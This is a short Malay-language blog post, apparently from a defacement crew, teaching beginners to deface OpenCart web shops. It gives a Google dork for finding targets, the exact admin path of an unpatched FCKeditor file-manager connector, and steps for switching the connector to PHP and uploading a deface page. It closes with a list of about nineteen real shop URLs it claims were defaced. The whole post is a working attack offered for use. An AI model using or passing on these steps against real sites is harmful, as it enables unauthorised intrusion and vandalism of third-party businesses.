Hai Semua.
Hari ni aku nk tunjukkan korang trik untuk deface bagi newbie.
Harap trik ni berguna untuk korang.
1) Create file deface anda dahulu , menggunakan extension .html , contohnya deface.html
2) Search di Google , menggunakan dork ini : Powered by OpenCart . Anda boleh juga menambahkan carian untuk domain tertentu , seperti .com . Contoh: Powered by OpenCart site:.com
3) Exploit bgi OpenCart : /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html . cari satu persatu web yang belum di-patch , dan masukkan exploit diatas .
Contoh: /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html ,
Contoh 2:/cms/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html pilih salah satu je..
4) Ganti connector : ASP ke PHP , pilih file , then upload.
5) Ok , so file deface korang akan jadi seperti ini . Contoh: www.site.com/deface.html , Dengan ini , korang telah berjaya deface web target ^^
LIST WEBSITE YG TLAH DI-DEFACE : http://bestonlinediscounts.net/ACS1A_CREWZ(1).html http://shop.tjokgus.com/ACS1A_CREWZ.html http://organicjewelries.com/ACS1A_CREWZ.html http://www.inputandanalysis.com/ACS1A_CREWZ.html http://www.schoolshopper.com.au/ACS1A_CREWZ.html http://wenrestaurant.com/ACS1A_CREWZ.html http://www.computer-planet.it/ACS1A_CREWZ.html http://baliclothingexporter.com/ACS1A_CREWZ.html http://www.planespares.com/ACS1A_CREWZ.html http://www.ufficio2000.biz/ACS1A_CREWZ.html http://www.disulmona.com/ACS1A_CREWZ.html http://wolfi.it/ACS1A_CREWZ.html http://www.superbikecarbonparts.com/ACS1A_CREWZ.html http://www.vendografica.biz/ACS1A_CREWZ.html http://mcgearusa.com/ACS1A_CREWZ.html http://www.shotgunstock.net/ACS1A_CREWZ.html http://virtualgeorge.info/ACS1A_CREWZ.html http://grammysfabrics.com/ACS1A_CREWZ.html http://www.aquariumsystem.it/ACS1A_CREWZ.html
No comments:
Post a Comment